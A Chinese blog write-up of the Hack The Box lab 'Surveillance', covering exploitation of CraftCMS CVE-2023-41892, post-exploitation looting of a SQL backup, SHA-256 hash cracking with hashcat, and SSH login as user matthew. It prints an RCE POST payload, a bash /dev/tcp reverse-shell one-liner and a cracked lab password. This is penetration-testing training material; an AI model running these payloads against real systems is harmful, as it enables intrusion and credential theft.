[渗透测试] HTB_Surveillance WriteUp [上]
靶机:Surveillance (from Hack The Box)
工具:Kali Linux
目标:拿到user和root的一串32位hex字符串
## 配置hosts
环境启动后,要设置一下hosts的映射关系,把IP与域名写入/etc/hosts里,不然无法打开环境。


## 信息搜集
#1 打开站点进行了以下尝试:
1)nmap扫描端口

2)dirsearch扫描文件目录

#2 发现目标仅开放22和80端口,存在admin目录,其它目录访问过后暂未发现用处。于是尝试访问http://surveillance.htb/admin。搜集到系统指纹信息,是一套CraftCMS系统。

期间进行过密码爆破,但是没用,随后去网上搜一下看看有没有可用的nday。
## 漏洞利用,GetSHELL
参考文章:CVE-2023-41892 CraftCMS远程代码命令执行漏洞利用分析。发现这套系统存在可利用的RCE,经过测试,相关漏洞存在:
POST方式提交:action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

在GitHub上也找到可以利用的脚本,于是利用前辈写好的exp直接打(exp链接)并拿到了shell。
然后把shell反弹到自己机器上,不然容易断,也更容易进行操作:bash -c "bash -i >& /dev/tcp/xxxx/12345 0>&1"。
## 后渗透---信息搜集
因为我们拿到的shell还不是user或者root,只是一个www-data,所以现在要寻找能拿到user有关的信息。
1)访问/etc/passwd,发现有俩可能是我们要用到的:matthew和zoneminder

2)逛一圈儿网站目录文件,发现/var/www/html/craft/storage/backups路径下有一个sql备份包

肯定是想要尝试下下来看一下,所以我把这个包复制到/var/www/html/craft/web下并改名为1.zip,这样就可以直接访问http://surveillance.htb/1.zip获得这个压缩包了。打开之后搜索matthew就找到了和其相关的内容:

这是一条sql插入语句,通过表users和相应字段,可以大致判断这一条语句内的信息就是关于我们所要找的user,其中有一串疑似密码的东西(39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec),但具体是什么加密类型我们不知道,查阅资料可以利用hash-identifier(kali自带)来查询:

看样子应该是SHA-256,但是咋解???查询资料,尝试用hashcat来进行爆破,-m 1400 表示进行SHA-256类型爆破,把那串密文保存到一个文档中(我的是code.txt)并结合kali自带的字典/usr/share/wordlists/rockyou.txt(我的需要先从rockyou.txt.gz解压出来才能用)。因为之前解过了,后面加上--show参数看解的密码。

## 拿到user-matthew的flag
我们拿到了用户名:matthew和密码starcraft122490,那么直接ssh进行连接,拿到用户matthew的shell

至此,拿到user的flag

root权限的获得还在研究中~
[渗透测试] HTB_Surveillance WriteUp [上]的更多相关文章
- xss之渗透测试
跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用 ...
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
Kali Linux Web 渗透测试视频教程—第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...
- 使用XAMPP和DVWA在Windows7上搭建渗透测试环境
前言: XAMPP是一个Web应用程序运行环境集成软件包,包括MySQL.PHP.PerI和Apache的环境及Apache.MySQL.FilleZilla.Mercury和Tomecat等组件.D ...
- 使用WampServer和DVWA在Windows10上搭建渗透测试环境
前言: DVWA是一个具有脆弱性的Web测试应用,需要PHP和MySQL的环境支持.我们可以手动配置DVWA所需的运行环境,也可以使用WampServer进行搭建.WampServer是集成了Apac ...
- Burpsuite常用模块详解以及渗透测试上的运用
0x00前言 哪有什么前言,大家好,我是浅安.QQ:320229344... 0x01 JDK的安装,以及Burpsuite的成功开启. burpsuite基于JAVA环境才能正常运行的.所以要先安装 ...
- 远程桌面(RDP)上的渗透测试技巧和防御
0x00 前言 在本文中,我们将讨论四种情况下的远程桌面渗透测试技巧方法.通过这种攻击方式,我们试图获取攻击者如何在不同情况下攻击目标系统,以及管理员在激活RDP服务时来抵御攻击时应采取哪些主要的 ...
- 小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具
后渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1.上传各种工具 2.提权:为了全面控制目标系统 3.擦除攻击痕迹:防止管理员通过日 ...
- 【10.21总结】一个渗透测试练习实例——发现未知的漏洞(Race condition)
Write-up地址:Exploiting an unknown vulnerability 作者:Abhishek Bundela 这篇文章跟我之前看到的文章不太一样,作者是按照一个练习的方式简单描 ...
- github渗透测试工具库
本文作者:Yunying 原文链接:https://www.cnblogs.com/BOHB-yunying/p/11856178.html 导航: 2.漏洞练习平台 WebGoat漏洞练习平台: h ...
- github渗透测试工具库[转载]
前言 今天看到一个博客里有这个置顶的工具清单,但是发现这些都是很早以前就有文章发出来的,我爬下来后一直放在txt里吃土.这里一起放出来. 漏洞练习平台 WebGoat漏洞练习平台:https://gi ...
随机推荐
- spring复习(二)AOP
1.aop基于xml以及注解的AOP配置 什么是AOP 简单的说它就是把我们程序重复的代码抽取出来,在需要执行的时候,使用动态代理的技术,在不修改源码的基础上,对我们的已有方法进行增强. AOP术语: ...
- openGauss社区入门(openGauss-定时任务)
为什么要使用定时任务 在一个固定的时间点活间隔一段时间需要频繁触发某一动作,为了使用便捷,有了定时任务,极大的减少了工作的重复性,提高了效率. 定时任务的内容 基于定时任务产生的背景,定时任务内容包括 ...
- tracer 原理
前言 准备整理网络章节,先整理概念. tracer 是一个可以获取我们的主机到访问端中间经过了哪些路由,这个对于我们非常重要,看下原理吧. 正文 tracer 在unix中是tracerRout. 它 ...
- 实训篇-Html-表格练习1
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...
- 架构设计|基于 raft-listener 实现实时同步的主备集群
背景以及需求 线上业务对数据库可用性可靠性要求较高,要求需要有双 AZ 的主备容灾机制. 主备集群要求数据和 schema 信息实时同步,数据同步平均时延要求在 1s 之内,p99 要求在 2s 之内 ...
- vue中 如何实现一个单文件组件
前端开发人员只要了解过vue.js框架可能都知道单文件组件.vue.js中的单文件组件允许在一个文件中定义一个组件的所有内容.这是一个非常有用的解决方案,在浏览器网页中已经开始提倡这种机制.但是不幸的 ...
- Django框架——图书管理系统、聚合查询、分组查询、F与Q查询
图书管理系统 1.表设计 先考虑普通字段再考虑外键字段 数据库迁移.测试数据录入 2.首页展示 3.书籍展示 4.书籍添加 5.书籍编辑 后端如何获取用户想要编辑的数据.前端如何展示出待编辑的数据 6 ...
- Python 潮流周刊#47:当你的老师希望你去做开源
本周刊由 Python猫 出品,精心筛选国内外的 250+ 信息源,为你挑选最值得分享的文章.教程.开源项目.软件工具.播客和视频.热门话题等内容.愿景:帮助所有读者精进 Python 技术,并增长职 ...
- 【笔记】go语言--(Slice)切片的概念
go--(Slice)切片的概念 //切片是什么,定义一个arr,定义一个s为arr中的2到6,这个s就是一个切片 arr := [...]int{0,1,2,3,4,5,6,7} s := arr[ ...
- 阿里云日志服务SLS携手观测云发布可观测性解决方案,共建可观测应用创新
简介: 2022年云栖大会期间,阿里云同观测云共同发布可观测性联合解决方案.观测云通过集成日志服务SLS的产品能力,发布了观测云SAAS专属版. 2022年云栖大会期间,阿里云同观测云共同发布可观测性 ...